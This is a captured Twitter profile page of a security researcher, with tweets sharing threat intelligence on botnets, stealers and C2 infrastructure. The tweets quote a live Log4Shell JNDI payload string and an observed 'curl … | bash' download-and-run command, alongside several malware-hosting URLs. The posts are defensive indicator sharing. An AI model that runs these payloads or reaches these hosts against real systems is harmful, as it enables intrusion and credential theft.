Toli

130 posts

Toli banner
Toli

Toli

@tolisec

Security Researcher. creator @elfdigest.

United Kingdom Присоединился Kasım 2017
743 Подписки922 Подписчики
Закреплённый твит
Toli
Toli@tolisec·
IoT Botnet Exploiting #CVE-2021-44228 #log4j User-Agent: ${jndi:ldap://179.43.175.101:1389/o=tomcat} The payload is JavaScript code executed in Java using ScriptEngineManager. IOCs and sample: tolisec.com/iot-botnet-exp…
Toli tweet mediaToli tweet media
English
1
42
110
0
Fox_threatintel
Fox_threatintel@banthisguy9349·
#obfuscated #elf found that by the looks of it is a variant of #mirai malware urls: hxxp://185.196.10.215:12234/mips.bin hxxp://185.196.10.215:12234/x86_64.bin They really tried to hide on port 12234 with .bin file extension 🤣 cc: @tolisec @500mk500 @abuse_ch
Fox_threatintel tweet media
English
2
1
16
6.7K
Toli
Toli@tolisec·
@banthisguy9349 @500mk500 nice catch! VT has it as metasploit implant, C2: 15.206.116.117:8787
English
0
0
2
19
Fox_threatintel
Fox_threatintel@banthisguy9349·
Test.elf! suspicious file! 147.45.44.100 opendir was seen on 27th of july. Ip down now it seems 176.32.35.254 opendir was seen on 31th of july. Ip down now it seems although the 3rd one urlhaus.abuse.ch/host/15.206.11… has some #elf linux #backdoors
Fox_threatintel tweet mediaFox_threatintel tweet mediaFox_threatintel tweet media
English
1
1
12
1.3K
Toli
Toli@tolisec·
@banthisguy9349 potential C2 for [aee499304dd672782f404c1da20436ce162c44cd37f9d256275089fc17b2d7ed] is 147.78.12[.]176
Indonesia
1
0
1
96
Fox_threatintel
Fox_threatintel@banthisguy9349·
fresh observed #elf #malware ! with very low detections 5c21a3451c7f4bcb6737a8904efc7ea9ee10b3994f324b2ece1610883c2394f1 3bd5be1f538f8cc195dbffd77d01e0c2509c56139a307b72d72d5bdbe2245584 c9e62e041871b6a8be78ea685ec57d50e6b7006955cd2268c5413828958aa2fe x.com/banthisguy9349…
Fox_threatintel@banthisguy9349

IOC's of malware being spread to infected the devices. urlhaus.abuse.ch/host/38.6.224.… - up urlhaus.abuse.ch/host/204.93.16… - up urlhaus.abuse.ch/host/62.72.185… - down urlhaus.abuse.ch/host/141.98.10… - down urlhaus.abuse.ch/browse.php?sea…

English
4
8
16
2.5K
Toli ретвитнул
☩MalwareMustDie
☩MalwareMustDie@malwaremustdie·
📢 In #FIRSTCTI22, @unixfreaxjp w/ LACERT teams will share the implementation of @FIRSTdotOrg #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam #pTargeted-Web-Skimming-on-E-Commerce-Sites" target="_blank" rel="nofollow noopener">first.org/events/symposi… Register soon, we value your time with good sharing!
FIRST.org@FIRSTdotOrg

Register for #FIRSTCTI22 in Berlin, 1-3 November! Program agenda is available for viewing at ow.ly/uhL750KCkBO. Room block offers expire soon! #cybersec #misp #threatintelligence #threatscape #cti

English
1
14
24
0
Toli ретвитнул
Germán Fernández
Germán Fernández@1ZRR4H·
Están llegando los mineros! 🤖 (CVE-2022-1388) IP atacante: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Muestras: bazaar.abuse.ch/browse/tag/CVE… * Incluye exfiltración de credenciales SSH
Germán Fernández tweet mediaGermán Fernández tweet mediaGermán Fernández tweet mediaGermán Fernández tweet media
Español
5
10
27
0
Toli ретвитнул
Eric Capuano - Bsky: @eric.zip
Eric Capuano - Bsky: @eric.zip@eric_capuano·
Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out @echotrailco - solid collection of information & stats about common binaries found on healthy systems. echotrail.io
English
7
78
302
0
Toli ретвитнул
R.
R.@0xrb·
𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia Threat Actor keep changing urls C2 Domain : http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2
R. tweet media
English
0
8
21
0
Toli
Toli@tolisec·
@verovaleros Have a speedy recovery!
English
1
0
1
0
Toli ретвитнул
R.
R.@0xrb·
Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451
R. tweet media
English
1
13
24
0
Toli ретвитнул
R.
R.@0xrb·
Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc
R. tweet media
Italiano
0
6
7
0
Toli ретвитнул
R.
R.@0xrb·
Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: @500mk500 (;
R. tweet mediaR. tweet media
English
5
25
77
0